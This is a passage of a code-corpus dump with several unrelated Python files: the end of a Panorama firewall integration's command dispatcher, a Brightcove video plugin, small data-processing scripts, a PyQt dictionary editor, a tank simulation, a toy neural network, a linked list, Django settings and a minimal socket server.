panorama_get_edl_command(demisto.args().get('name'))\n\n elif demisto.command() == 'panorama-create-edl':\n panorama_create_edl_command(args)\n\n elif demisto.command() == 'panorama-edit-edl':\n panorama_edit_edl_command(args)\n\n elif demisto.command() == 'panorama-delete-edl':\n panorama_delete_edl_command(demisto.args().get('name'))\n\n elif demisto.command() == 'panorama-refresh-edl':\n panorama_refresh_edl_command(args)\n\n # Registered IPs\n elif demisto.command() == 'panorama-register-ip-tag':\n panorama_register_ip_tag_command(args)\n\n elif demisto.command() == 'panorama-unregister-ip-tag':\n panorama_unregister_ip_tag_command(args)\n\n # Registered Users\n elif demisto.command() == 'panorama-register-user-tag':\n panorama_register_user_tag_command(args)\n\n elif demisto.command() == 'panorama-unregister-user-tag':\n panorama_unregister_user_tag_command(args)\n\n # Security Rules Managing\n elif demisto.command() == 'panorama-list-rules':\n panorama_list_rules_command(args.get('tag'))\n\n elif demisto.command() == 'panorama-move-rule':\n panorama_move_rule_command(args)\n\n # Security Rules Configuration\n elif demisto.command() == 'panorama-create-rule':\n panorama_create_rule_command(args)\n\n elif demisto.command() == 'panorama-custom-block-rule':\n panorama_custom_block_rule_command(args)\n\n elif demisto.command() == 'panorama-edit-rule':\n panorama_edit_rule_command(args)\n\n elif demisto.command() == 'panorama-delete-rule':\n panorama_delete_rule_command(args.get('rulename'))\n\n # Traffic Logs - deprecated\n elif demisto.command() == 'panorama-query-traffic-logs':\n panorama_query_traffic_logs_command(args)\n\n elif demisto.command() == 'panorama-check-traffic-logs-status':\n panorama_check_traffic_logs_status_command(args.get('job_id'))\n\n elif demisto.command() == 'panorama-get-traffic-logs':\n panorama_get_traffic_logs_command(args.get('job_id'))\n\n # Logs\n elif demisto.command() == 'panorama-query-logs':\n panorama_query_logs_command(args)\n\n elif demisto.command() == 'panorama-check-logs-status':\n panorama_check_logs_status_command(args.get('job_id'))\n\n elif demisto.command() == 'panorama-get-logs':\n panorama_get_logs_command(args)\n\n # Pcaps\n elif demisto.command() == 'panorama-list-pcaps':\n panorama_list_pcaps_command(args)\n\n elif demisto.command() == 'panorama-get-pcap':\n panorama_get_pcap_command(args)\n\n # Application\n elif demisto.command() == 'panorama-list-applications':\n panorama_list_applications_command(args.get('predefined'))\n\n # Test security policy match\n elif demisto.command() == 'panorama-security-policy-match':\n panorama_security_policy_match_command(args)\n\n # Static Routes\n elif demisto.command() == 'panorama-list-static-routes':\n panorama_list_static_routes_command(args)\n\n elif demisto.command() == 'panorama-get-static-route':\n panorama_get_static_route_command(args)\n\n elif demisto.command() == 'panorama-add-static-route':\n panorama_add_static_route_command(args)\n\n elif demisto.command() == 'panorama-delete-static-route':\n panorama_delete_static_route_command(args)\n\n # Firewall Upgrade\n # Check device software version\n elif demisto.command() == 'panorama-show-device-version':\n panorama_show_device_version_command(args.get('target'))\n\n # Download the latest content update\n elif demisto.command() == 'panorama-download-latest-content-update':\n panorama_download_latest_content_update_command(args.get('target'))\n\n # Download the latest content update\n elif demisto.command() == 'panorama-content-update-download-status':\n panorama_content_update_download_status_command(args)\n\n # Install the latest content update\n elif demisto.command() == 'panorama-install-latest-content-update':\n panorama_install_latest_content_update_command(args.get('target'))\n\n # Content update install status\n elif demisto.command() == 'panorama-content-update-install-status':\n panorama_content_update_install_status_command(args)\n\n # Check PAN-OS latest software update\n elif demisto.command() == 'panorama-check-latest-panos-software':\n panorama_check_latest_panos_software_command(args.get('target'))\n\n # Download target PAN-OS version\n elif demisto.command() == 'panorama-download-panos-version':\n panorama_download_panos_version_command(args)\n\n # PAN-OS download status\n elif demisto.command() == 'panorama-download-panos-status':\n panorama_download_panos_status_command(args)\n\n # PAN-OS software install\n elif demisto.command() == 'panorama-install-panos-version':\n panorama_install_panos_version_command(args)\n\n # PAN-OS install status\n elif demisto.command() == 'panorama-install-panos-status':\n panorama_install_panos_status_command(args)\n\n # Reboot Panorama Device\n elif demisto.command() == 'panorama-device-reboot':\n panorama_device_reboot_command(args.get('target'))\n\n # PAN-OS Set vulnerability to drop\n elif demisto.command() == 'panorama-block-vulnerability':\n panorama_block_vulnerability(args)\n\n # Get pre-defined threats list from the firewall\n elif demisto.command() == 'panorama-get-predefined-threats-list':\n panorama_get_predefined_threats_list_command(args.get('target'))\n\n elif demisto.command() == 'panorama-show-location-ip':\n panorama_show_location_ip_command(args.get('ip_address'))\n\n elif demisto.command() == 'panorama-get-licenses':\n panorama_get_license_command()\n\n elif demisto.command() == 'panorama-get-security-profiles':\n get_security_profiles_command(args.get('security_profile'))\n\n elif demisto.command() == 'panorama-apply-security-profile':\n apply_security_profile_command(**args)\n\n elif demisto.command() == 'panorama-get-ssl-decryption-rules':\n get_ssl_decryption_rules_command(**args)\n\n elif demisto.command() == 'panorama-get-wildfire-configuration':\n get_wildfire_configuration_command(**args)\n\n elif demisto.command() == 'panorama-get-wildfire-best-practice':\n get_wildfire_best_practice_command()\n\n elif demisto.command() == 'panorama-enforce-wildfire-best-practice':\n enforce_wildfire_best_practice_command(**args)\n\n elif demisto.command() == 'panorama-url-filtering-block-default-categories':\n url_filtering_block_default_categories_command(**args)\n\n elif demisto.command() == 'panorama-get-anti-spyware-best-practice':\n get_anti_spyware_best_practice_command()\n\n elif demisto.command() == 'panorama-get-file-blocking-best-practice':\n get_file_blocking_best_practice_command()\n\n elif demisto.command() == 'panorama-get-antivirus-best-practice':\n get_antivirus_best_practice_command()\n\n elif demisto.command() == 'panorama-get-vulnerability-protection-best-practice':\n get_vulnerability_protection_best_practice_command()\n\n elif demisto.command() == 'panorama-get-url-filtering-best-practice':\n get_url_filtering_best_practice_command()\n\n elif demisto.command() == 'panorama-create-antivirus-best-practice-profile':\n create_antivirus_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-create-anti-spyware-best-practice-profile':\n create_anti_spyware_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-create-vulnerability-best-practice-profile':\n create_vulnerability_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-create-url-filtering-best-practice-profile':\n create_url_filtering_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-create-file-blocking-best-practice-profile':\n create_file_blocking_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-create-wildfire-best-practice-profile':\n create_wildfire_best_practice_profile_command(**args)\n\n elif demisto.command() == 'panorama-show-user-id-interfaces-config':\n show_user_id_interface_config_command(args)\n\n elif demisto.command() == 'panorama-show-zones-config':\n show_zone_config_command(args)\n\n elif demisto.command() == 'panorama-list-configured-user-id-agents':\n list_configured_user_id_agents_command(args)\n\n elif demisto.command() == 'panorama-upload-content-update-file':\n return_results(panorama_upload_content_update_file_command(args))\n\n elif demisto.command() == 'panorama-install-file-content-update':\n panorama_install_file_content_update_command(args)\n\n else:\n raise NotImplementedError(f'Command {demisto.command()} was not implemented.')\n\n except Exception as err:\n return_error(str(err))\n\n finally:\n LOG.print_log()\n\n\nif __name__ in [\"__builtin__\", \"builtins\", '__main__']:\n main()\n","sub_path":"Packs/PAN-OS/Integrations/Panorama/Panorama.py","file_name":"Panorama.py","file_ext":"py","file_size_in_byte":280872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"528629967","text":"import time\nimport cgi\nimport datetime\nimport simplejson\nfrom channel import BaseChannel, ChannelException, ChannelMetaClass, STATUS_BAD, STATUS_GOOD, STATUS_UGLY\nfrom utils import *\nimport httplib\nimport xbmcplugin\nimport xbmc\n\ntry:\n from pyamf import remoting\n has_pyamf = True\nexcept ImportError:\n has_pyamf = False\n\n\nclass BrightcoveBaseChannel(BaseChannel):\n\n \"\"\"\n None of this works. All videos stop playing after 1 minute.\n\n \"\"\"\n is_abstract = True\n\n def get_swf_url(self):\n conn = httplib.HTTPConnection('c.brightcove.com')\n qsdata = dict(width=640, height=480, flashID=self.flash_experience_id,\n bgcolor=\"#000000\", playerID=self.player_id, publisherID=self.publisher_id,\n isSlim='true', wmode='opaque', optimizedContentLoad='true', autoStart='', debuggerID='')\n qsdata['@videoPlayer'] = self.video_id\n logging.debug(\"SWFURL: %s\" % (urllib.urlencode(qsdata),))\n conn.request(\"GET\", \"/services/viewer/federated_f9?&\" +\n urllib.urlencode(qsdata))\n resp = conn.getresponse()\n location = resp.getheader('location')\n base = location.split(\"?\", 1)[0]\n location = base.replace(\n \"BrightcoveBootloader.swf\", \"connection/ExternalConnection_2.swf\")\n self.swf_url = location\n\n def get_clip_info(self, player_id, video_id):\n conn = httplib.HTTPConnection(\"c.brightcove.com\")\n envelope = self.build_amf_request(player_id, video_id)\n conn.request(\"POST\", \"/services/amfgateway\", str(remoting.\n encode(envelope).read()), {'content-type': 'application/x-amf'})\n response = conn.getresponse().read()\n response = remoting.decode(\n response).bodies[0][1].body[0]['data']['videoDTO']\n logging.debug(response)\n return response\n\n def choose_rendition(self, renditions):\n maxrate = int(self.plugin.get_setting(\"max_bitrate\")) * 1024\n rends = [r for r in renditions if r['encodingRate'] < maxrate]\n if not rends:\n rends = renditions\n rends.sort(key=lambda r: r['encodingRate'])\n return rends[-1]\n\n def build_amf_request_body(self, player_id, video_id):\n return [\n player_id,\n {\n 'optimizeFeaturedContent': 1,\n 'featuredLineupFetchInfo': {\n 'fetchLevelEnum': 4,\n 'contentType': u'VideoLineup',\n 'childLimit': 100\n },\n 'lineupRefId': None,\n 'videoId': video_id,\n 'videoRefId': None,\n 'lineupId': None,\n 'fetchInfos': [\n {'fetchLevelEnum': 1,\n 'contentType': u'VideoLineup', 'childLimit': 100},\n {'grandchildLimit': 100, 'fetchLevelEnum': 3,\n 'contentType': u'VideoLineupList', 'childLimit': 100}\n ]\n }\n ]\n\n def build_amf_request(self, player_id, video_id):\n env = remoting.Envelope(amfVersion=0)\n env.bodies.append(\n (\n \"/2\",\n remoting.Request(\n target=\"com.brightcove.templating.TemplatingFacade.getContentForTemplateInstance\",\n body=self.build_amf_request_body(player_id, video_id),\n envelope=env\n )\n )\n )\n return env\n\n def find_ids(self, url):\n soup = BeautifulSoup(\n self.plugin.fetch(url, max_age=self.cache_timeout))\n self.flash_experience_id = soup.find(\"object\")['id']\n try:\n player_id = int(soup.find(\"object\").find(\"param\", {\n \"name\": \"playerID\"})['value'])\n except:\n player_id = None\n\n try:\n video_id = int(soup.find(\n 'object').find(\"param\", {\"name\": \"@videoPlayer\"})['value'])\n except:\n video_id = None\n\n return player_id, video_id\n","sub_path":"channels/brightcove.py","file_name":"brightcove.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"145267420","text":"import os\n\naaa = 'v3sPDRTem_new_Lower.result'\na = ['v3sPDRTem2_new','v3sPDRTem3_new','v3sPDRTem4_new','v3sPDRTem5_new',\n 'v3sPDRTem7_new','v3sPDRTem9_new']\nb = '_Lower.result'\n\nf = open(aaa,'r')\ng = open('all2.csv','w')\n\nff_all = []\nos.system('wc '+aaa+' -l')\nfor c in a:\n os.system('wc '+c+b+' -l')\n ff_all.append(open(c+b,'r').readlines())\n\ni = 0\nfor l in f:\n ll=l.split(',')\n g.write(ll[0]+','+ll[1]+','+ll[2]+','+ll[3])\n for cc in range(len(a)):\n e = ff_all[cc][i]\n ee = e.split(',')\n g.write(','+ee[1]+','+ee[2]+','+ee[3])\n i+=1\n g.write('\\n')\n","sub_path":"new_result/integrate.py","file_name":"integrate.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"628160127","text":"import pandas as pd \nimport xml.etree.ElementTree as et\n\n\ntree = et.parse('/Users/alessandropollastri/Desktop/country_data.xml')\nroot = tree.getroot()\n\ndf_cols = ['country', 'neighbor', 'direction', 'number']\nrows = []\n\nfor country in root.iter('country'):\n this_country = country.get('name')\n for child in country: \n if child.tag == 'neighbor':\n name = child.attrib.get(\"name\")\n direction = child.attrib.get(\"direction\")\n number = child.text\n rows.append({'country': this_country,\n 'neighbor': name,\n 'direction': direction,\n 'number': number,\n })\n \n\nout_df = pd.DataFrame(rows, columns = df_cols)\nout_df \n \n","sub_path":"xml_parse.py","file_name":"xml_parse.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"71485043","text":"# coding: utf-8\r\nfrom PyQt4 import QtCore, QtGui, uic\r\n\r\nfrom core.database import Regions, Distinct\r\nfrom core.validate import *\r\n\r\n\r\nclass DistinctController:\r\n data = QtGui.QStandardItemModel() # Модель де будуть міститись наші записи\r\n\r\n def __init__(self):\r\n self.window = None # Форма зі списком областей\r\n self.edit_form = None # Форма для додавання і редагування районів\r\n self.insert = None # Прапорець для того щоб ми знали чи потрібно обновляти запис чи додавати новий (true/false)\r\n self.discinct = None # Тут буде міститись наш запис\r\n self.menu = None # Контекстне меню\r\n self.regions = None # Список регіонів\r\n self.data.setColumnCount(2)\r\n\r\n # Ініціалізація форми\r\n def init_form(self, window):\r\n self.window = window\r\n self.window.setWindowTitle(u'Райони')\r\n self.window.table.setModel(self.data)\r\n self.window.table.setHorizontalHeader(QtGui.QHeaderView(QtCore.Qt.Horizontal, self.window.table))\r\n self.window.setFixedWidth(500)\r\n\r\n # Встановлюємо контекстне меню\r\n self.menu = QtGui.QMenu(self.window)\r\n a_add = self.menu.addAction(u'Додати')\r\n a_edit = self.menu.addAction(u'Редагувати')\r\n a_delete = self.menu.addAction(u'Видалити')\r\n\r\n self.window.connect(a_add, QtCore.SIGNAL('triggered()'), self.show_add_form)\r\n self.window.connect(a_edit, QtCore.SIGNAL('triggered()'), self.show_edit_form)\r\n self.window.connect(a_delete, QtCore.SIGNAL('triggered()'), self.delete)\r\n\r\n self.window.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\r\n self.window.customContextMenuRequested.connect(self.show_context_menu)\r\n # Кінець налаштування контекстного меню\r\n\r\n # Встановелння заголовків таблиці\r\n def set_headers(self):\r\n self.data.setHeaderData(0, QtCore.Qt.Horizontal, QtCore.QString(u'Район'))\r\n self.data.setHeaderData(1, QtCore.Qt.Horizontal, QtCore.QString(u'Область'))\r\n # Розширення колонок по ширині таблиці\r\n self.window.table.horizontalHeader().setResizeMode(QtGui.QHeaderView.Stretch)\r\n\r\n # Отримання списку усіх районів\r\n def get_data(self):\r\n self.data.clear()\r\n for distinct in Distinct.select().join(Regions).where(Distinct.region == Regions.id):\r\n row = self.data.rowCount()\r\n self.data.setItem(row, 0, QtGui.QStandardItem(distinct.name))\r\n self.data.setItem(row, 1, QtGui.QStandardItem(distinct.region.name))\r\n\r\n self.set_headers()\r\n\r\n # Відобреження контекстного меню\r\n def show_context_menu(self, pos):\r\n self.menu.popup(self.window.mapToGlobal(pos))\r\n\r\n # Відображення форми для додавання нового запису\r\n def show_add_form(self):\r\n if not self.edit_form:\r\n self.edit_form = uic.loadUi('views/dict_edit_form_with_combobox.ui')\r\n self.edit_form.connect(self.edit_form.yes_no, QtCore.SIGNAL('accepted()'), self.commit)\r\n\r\n self.insert = True\r\n self.edit_form.name.setText('')\r\n self.edit_form.setWindowTitle(u'Новий район')\r\n self.edit_form.comboBox.clear()\r\n for regions in Regions.select():\r\n self.edit_form.comboBox.addItems(QtCore.QStringList(regions.name))\r\n\r\n self.edit_form.label_2.setText(u\"Область\")\r\n self.edit_form.show()\r\n\r\n # Відображення форми для редагування запису\r\n def show_edit_form(self):\r\n if not self.edit_form:\r\n self.edit_form = uic.loadUi('views/dict_edit_form_with_combobox.ui')\r\n self.edit_form.connect(self.edit_form.yes_no, QtCore.SIGNAL('accepted()'), self.commit)\r\n\r\n self.insert = False\r\n self.edit_form.comboBox.clear()\r\n # Отримую поточний запис\r\n self.get_data_from_table()\r\n self.edit_form.label_2.setText(u'Область')\r\n self.edit_form.name.setText(self.discinct.name)\r\n self.edit_form.setWindowTitle(self.discinct.name)\r\n self.edit_form.show()\r\n\r\n # Збереження даних\r\n def commit(self):\r\n if self.edit_form.name.text() == '':\r\n QtGui.QMessageBox.information(self.edit_form, u'Ви не ввели дані', u'Введіть назву району')\r\n else:\r\n # Тільки літери українського алфавіту\r\n if not is_only_ukrainian_letters(self.edit_form.name.text()):\r\n QtGui.QMessageBox.information(self.edit_form, u'Не вірний формат введення',\r\n u'Можна вводити тільки букви Українського алфавіту')\r\n else:\r\n self.region = Regions.get(Regions.name == self.edit_form.comboBox.currentText())\r\n\r\n # Якщо створюємо новий запис\r\n if self.insert:\r\n self.discinct = Distinct()\r\n self.discinct.name = self.edit_form.name.text()\r\n self.discinct.region = self.region\r\n self.discinct.save()\r\n else:\r\n # Оновлення запису\r\n self.discinct.name = self.edit_form.name.text()\r\n self.discinct.region = self.region\r\n self.discinct.save()\r\n\r\n self.get_data()\r\n self.edit_form.close()\r\n\r\n # Видалення запису\r\n def delete(self):\r\n index = self.window.table.selectedIndexes()[0]\r\n self.discinct = Distinct.select().join(Regions) \\\r\n .where((Distinct.region == Regions.id) &\r\n (Distinct.name == unicode(self.window.table.model().data(index).toString()))).get()\r\n\r\n reply = QtGui.QMessageBox.question(self.window, u'Видалення',\r\n u'Ви дійсно бажаєте видалити ' + self.discinct.name + u\" область ?\",\r\n QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)\r\n\r\n if reply == QtGui.QMessageBox.Yes:\r\n try:\r\n self.discinct.delete_instance()\r\n self.get_data()\r\n except:\r\n QtGui.QMessageBox.information(self.edit_form, u'Помилка',\r\n u'Помилка видалення')\r\n\r\n # Отримання поточного запису з таблиці\r\n def get_data_from_table(self):\r\n try:\r\n index = self.window.table.selectedIndexes()[0]\r\n self.discinct = Distinct.select().join(Regions) \\\r\n .where((Distinct.region == Regions.id) &\r\n (Distinct.name == unicode(self.window.table.model().data(index).toString()))).get()\r\n\r\n for regions in Regions.select():\r\n self.edit_form.comboBox.addItems(QtCore.QStringList(regions.name))\r\n\r\n self.edit_form.comboBox.setEditText(self.discinct.region.name)\r\n except Exception:\r\n QtGui.QMessageBox.information(self.edit_form, u'Помилка', u'Ви не вибрали дані')\r\n","sub_path":"controllers/distincts.py","file_name":"distincts.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"466129082","text":"#!/usr/bin/env python\n\nimport copy\nimport logging, optparse\nimport threading, Queue \nimport time \n\nfrom configobj import ConfigObj\n\nfrom protolibs import ifaces\n#import protolibs.ifaces as ifaces #this relies on a symlink back to protolibs\n\n\"\"\"\n@author Brad Reaves\n@version 0.1\nFebruary 2011\n@license GPL2\n\nThis module defines the necessary functions, constants, and variables to\nsimulate a simple fluid tank consisting of a single output valve and\nsingle input pump governed by a single virtual device and monitored by a second\nvirtual device.\n\"\"\"\n\n#--------------- Parse Configuration Options ----------------\n\n#Required Items:\n#---Communication interface\n #Type (udp, tcp, pipes, serial)\n #Setup options (ports, filenames, destination addresses, etc)\n#---Virtual Device Setup\n\n#Simulation Details (constants, etc)\n# physical constants\n# simulation time\n# variables and default values\nclass Simulation():\n \"\"\"This class obtains simulation information from a configuration file,\n sets up a simulation state, provides a method to step the simulation\n forward in time.\n \"\"\"\n def readConfig(self):\n \"\"\"Opens and parses the configuration file in the local directory. The\n results are available in self.config .\"\"\"\n ##Open ConfigFile\n self.config=ConfigObj(infile='sims/rtutank/config', unrepr=True)#MAKE READ ONLY\n \"\"\"\n self.config = dict()\n self.config['iface']={\n 'typ':'udp', \n 'sport':9912, #9912-9949 are unassigned\n 'recipients' : [('127.0.0.1',9913)],\n 'timeout' : .1 \n }\n self.config['sim_state']={\n 'simtime' : 0, #time in the simulation\n 'pump' : True, #Whether pump is on or off\n 'valve' : False, #Whether valve is open or not\n 'pressure' : 0 #Current pressure in the tank (psi)\n }\n self.config['sim_constants']={\n 'valve_rate' : -1 ,#psi/sec\n 'pump_rate' : 2 #psi/sec\n }\n \"\"\"\n def __init__(self):\n \"\"\"Constructor for the simulation class. Calls readConfig() and \n creates an initial simulation state.\"\"\"\n self.readConfig()\n #/define/ comm interface type (based on config)\n ifaceinfo = self.config['simiface']\n ifacetype = getattr(ifaces, ifaceinfo['typ'])\n self.interface=ifacetype(**ifaceinfo)\n self.interface.initialize()\n\n #initialize variables in the procVarDictionary\n # use a deep copy so that we can't change the config dictionary\n self.simState = copy.deepcopy(self.config['sim_state'])\n self.simState['simtime'] = time.time()\n\n def step(self, upto=None):\n \"\"\"Function that modifies the simulation state from the curent\n simulation state to the time given in parameter upto.\n \n @param upto Time to simulate from simState['simtime'] to upto.\n upto should be a float in the format of the time.time()\n call -- i.e. unix time. If upto is None, the current time \n will be used.\n \"\"\"\n if upto is None:\n upto = time.time()\n deltaT = upto - self.simState['simtime'] \n if deltaT < 0:\n #This happens when we receive an update packet dated from before the\n # current simulation time. In that case, we return to let the\n # changes be applied, and then the simulation will step to the\n # current time, and all will be well. In the worst case, changes\n # should only be 100 ms old.\n return\n consts = self.config['sim_constants']\n \n #We're doing a simple model that's linear over time. Non-linear models\n # may require iterating over fractions deltaT to be accurate.\n # Numerical techniques from Sage or SciPy may be required for advanced\n # models.\n\n if self.simState['pump']:\n pumpContribution = deltaT * consts['pump_rate']\n else:\n pumpContribution = 0\n\n if self.simState['valve']:\n valveContribution = deltaT * consts['valve_rate']\n else:\n valveContribution = 0\n\n self.simState['pressure'] = self.simState['pressure'] +( \n pumpContribution + valveContribution)\n\n #Negative pressures are impossible\n if self.simState['pressure'] < 0: self.simState['pressure'] = 0\n\n self.simState['simtime'] = upto\n\n","sub_path":"mastertestbed/trunk/sims/rtutank/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"61994657","text":"import numpy as np\nimport keyboard as kb\nimport sys\n\nitterations = 1000000000\n\n# Training data\nflowers = [[3, 1.5, 1],\n [2, 1, 0],\n [4, 1.5, 1],\n [3, 1, 0],\n [3.5, .5, 1],\n [2, .5, 0],\n [5.5, 1, 1],\n [1, 1, 0]]\n\n# Sigmoid function\n\n\ndef sigmoid(x):\n f = 1/(1+np.exp(-x))\n return f\n\n# Neural network function\n\n\ndef neural_network():\n # Parameter initialization\n w1 = np.random.randn()\n w2 = np.random.randn()\n b = np.random.randn()\n learning_rate = 0.2 # The speed at wich the NN learns\n\n # Learning with a random point that changes every time\n for i in range(itterations):\n # Taking a random point to learn\n rand_index = np.random.randint(len(flowers))\n learning_flower = flowers[rand_index]\n target = learning_flower[2]\n\n # Neural network calculations\n z = w1 * learning_flower[0] + w2 * learning_flower[1] + b\n pred = sigmoid(z)\n\n # Error\n cost = (pred - target)**2\n\n # Back propagation\n dc_dpred = 2*(pred - target)\n\n dpred_dz = sigmoid(z) + (1 - sigmoid(z))\n\n dz_dw1 = learning_flower[0]\n dz_dw2 = learning_flower[1]\n dz_db = 1\n\n dc_dw1 = dc_dpred * dpred_dz * dz_dw1\n dc_dw2 = dc_dpred * dpred_dz * dz_dw2\n dc_db = dc_dpred * dpred_dz * dz_db\n\n w1 = w1 - learning_rate * dc_dw1\n w2 = w2 - learning_rate * dc_dw2\n b = b - learning_rate * dc_db\n\n # Printing the number of itterations\n if (i % 100) == 0:\n neural_network_data = open('NN.txt', 'w+')\n neural_network_data.write(str(w1) + ' ')\n neural_network_data.write(str(w2) + ' ')\n neural_network_data.write(str(b) + '\\n \\n')\n\n if (i % 100000) == 0:\n print(np.around(i/itterations * 100, decimals=4))\n\n # Check if ctrl + S is pressed and save the current neural network\n if kb.is_pressed('ctrl+s'):\n neural_network_data.close()\n print('You closed the app')\n sys.exit()\n else:\n pass\n\n neural_network_data.close()\n\n\nneural_network()\n","sub_path":"Python/Flower Problem/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"557728795","text":"class ListNode:\n def __init__(self, value, prev=None, next=None):\n self.value = value\n self.prev = prev\n self.next = next\n\nclass DoublyLinkedList:\n def __init__(self, node=None):\n self.head = node\n self.tail = node\n self.length = 1 if node else 0\n \n def __len__(self):\n # should return the length\n return self.length\n \n def add_to_head(self, value):\n # adds a new node to the front of the DLL\n new_node = ListNode(value)\n\n if self.head:\n new_node.next = self.head\n self.head.prev = new_node\n\n self.head = new_node\n else:\n self.head, self.tail = new_node, new_node\n\n self.length += 1\n\n def remove_from_head(self):\n # removes head node and return it's value\n if self.length == 0: return None\n\n remove = self.head\n self.length -= 1\n if self.head == self.tail: \n self.head, self.tail = None, None\n return remove.value\n\n else:\n self.head = self.head.next\n remove.next, self.head.prev = None, None\n\n return remove.value\n\n def add_to_tail(self, value):\n # adds a new node to the back of the DLL\n new_node = ListNode(value)\n self.length += 1\n if self.tail is None: self.head, self.tail = new_node, new_node\n\n else:\n self.tail.next = new_node\n new_node.prev = self.tail\n\n self.tail = new_node\n\n def remove_from_tail(self):\n # removes tail node and returns it's value\n if self.length == 0: return None\n\n self.length -= 1\n\n removed = self.tail\n if self.head == self.tail:\n self.head, self.tail = None, None\n return removed.value\n\n else:\n self.tail = self.tail.prev\n self.tail.next, removed.prev = None, None\n\n return removed.value\n\n def move_to_front(self, node):\n # takes a node and moves it to the front\n if node == self.head: return\n\n if node == self.tail:\n self.tail = node.prev\n\n self.tail.next = None\n node.prev = None\n\n node.next = self.head\n self.head.prev = node\n\n self.head = node\n \n else:\n node_prev, node_next = node.prev, node.next\n node_prev.next, node_next.prev = node_next, node_prev\n\n node.next = self.head\n self.head.prev = node\n self.head = node\n\n def move_to_end(self, node):\n # takes a node and moves it to the end\n if node == self.tail: return\n\n if node == self.head:\n self.head = self.head.next\n self.head.prev = None\n node.next = None\n else:\n node_prev, node_next = node.prev, node.next\n node_prev.next, node_next.prev = node.next, node.prev\n\n node.prev = self.tail\n self.tail.next = node\n self.tail = node \n\n def delete(self, node):\n # deletes a node\n if self.length == 0: return None\n\n self.length -= 1\n if self.head == self.tail:\n self.head, self.tail = None, None\n\n return node.value\n \n elif node == self.head:\n self.head = self.head.next\n node.next, self.head.prev = None, None\n\n return node.value\n\n elif node == self.tail:\n self.tail = self.tail.prev\n node.prev, self.tail.next = None, None\n\n return node.value\n\n else:\n node_prev, node_next = node.prev, node.next\n node_prev.next, node_next.prev = node.next, node.prev\n\n return node.value\n\n def get_max(self):\n # gets the max value from the nodes and returns it\n return check_node(self.head)\n\ndef check_node(node):\n\n recurse_max = None\n if node.next is not None: recurse_max = check_node(node.next)\n\n if recurse_max is None:\n return node.value\n if node.value > recurse_max: \n return node.value\n else:\n return recurse_max","sub_path":"doubly_linked_list/dll_1.py","file_name":"dll_1.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"207317338","text":"# -*- coding: utf-8 -*-\n\nfrom .base import *\n\n\nADMINS = ()\n\nALLOWED_HOSTS = ['127.0.0.1', 'localhost']\n\nDEBUG = False\n\nDEFAULT_FROM_EMAIL = os.getenv('DEFAULT_FROM_EMAIL', '')\n\nEMAIL_BACKEND = os.getenv('EMAIL_BACKEND', '')\n\nINSTALLED_APPS = INSTALLED_APPS + (\n 'gunicorn',\n 'storages',\n)\n\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\nSERVER_EMAIL = os.getenv('SERVER_EMAIL', '')\n\nSESSION_CACHE_ALIAS = 'default'\n\nSESSION_COOKIE_SECURE = True\n\nSESSION_ENGINE = 'django.contrib.sessions.backends.cache'\n\n\n# ---------------\n# dj-database-url\n# https://github.com/kennethreitz/dj-database-url\n# ---------------\nDATABASES = {\n 'default': dj_database_url.config()\n}\n\n\n# ---------------\n# djangl-storages\n# http://django-storages.readthedocs.org/en/latest/\n# ---------------\nif os.getenv('ENABLE_DJANGO_STORAGES', False):\n DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\n\n STATICFILES_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\n\n AWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID', '')\n\n AWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET_ACCESS_KEY', '')\n\n AWS_STORAGE_BUCKET_NAME = os.getenv('AWS_STORAGE_BUCKET_NAME', '')\n","sub_path":"src/project_name/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"36565108","text":"import socket\nimport time\n\nfrom utils import log\n\n\ndef run(host='', port=3000):\n log('start at', '{}:{}'.format(host, port))\n # Configure socket\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((host, port))\n\n # infinite loop, server forever\n while True:\n # passively wait, 3: maximum number of connections in the queue\n s.listen(3)\n # accept and establish connection\n conn, addr = s.accept()\n # receive message\n request = conn.recv(1024)\n time.sleep(3)\n request = request.decode('utf-8')\n log('request is: ',request)\n log('Connected by', addr)\n\n # send message\n header = 'HTTP/1.1 200 OK\\r\\nContent-Type: text/html\\r\\n'\n body = '

Yes

'\n response = header + '\\r\\n' + body\n conn.sendall(response.encode('utf-8'))\n # close connection\n conn.close()\n\n\nif __name__ == '__main__':\n config = dict(\n host='',\n port=3000,\n )\n run(**config)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}